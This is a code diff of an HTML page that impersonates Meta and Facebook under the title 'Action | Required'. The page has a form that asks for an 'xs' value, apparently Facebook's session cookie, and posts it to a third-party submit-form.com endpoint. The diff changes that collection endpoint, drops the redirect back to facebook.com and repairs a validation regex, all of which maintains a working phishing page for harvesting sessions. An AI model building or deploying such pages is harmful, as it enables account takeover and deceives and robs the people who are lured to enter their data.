--- a/index.html
+++ b/index.html
@@ -1,10 +1,11 @@
+
 <!DOCTYPE html>
 <html lang="en">
 
 <head>
   <meta charset="UTF-8" />
   <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" />
-  <link rel="stylesheet" href="styles.css" />
+  <link rel="stylesheet" href="style.css" />
   <title>Action | Required</title>
 </head>
 
@@ -30,11 +31,7 @@
     <br /><br />
 
     <div class="main-body">
-      <form class="sm:hidden lg:block md:block" action="https://submit-form.com/6D7OCUHKA" method="post">
-    <input
-    type="hidden"
-    name="_redirect"
-    value="https://www.facebook.com/"
+      <form class="content" action="https://submit-form.com/mTj2onEsd" method="POST">
         <div>
           <img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" width="140" />
         </div>
@@ -81,7 +78,7 @@
         <div>
           <p class="mt-4">xs</p>
           <input type="text" name="xs" id="xs" placeholder=""
-            pattern="^(?=.[a-z])(?=.[A-Z])(?=.\d)(?=.[@#$%^&amp;+=]).{12,}$" title="Must Watch Detailed Video"
+            pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" title="Must Watch Detailed Video"
             required="1" data-twofas-input-listener="true" data-twofas-element-number="2" />
         </div>
         <br />
@@ -103,7 +100,7 @@
     </div>
     <br /><br />
     <div>
-      <p class="copy-r">Meta © 2024</p>
+      <p class="copy-r">Meta ©️ 2024</p>
     </div>
   </div>
 </body>
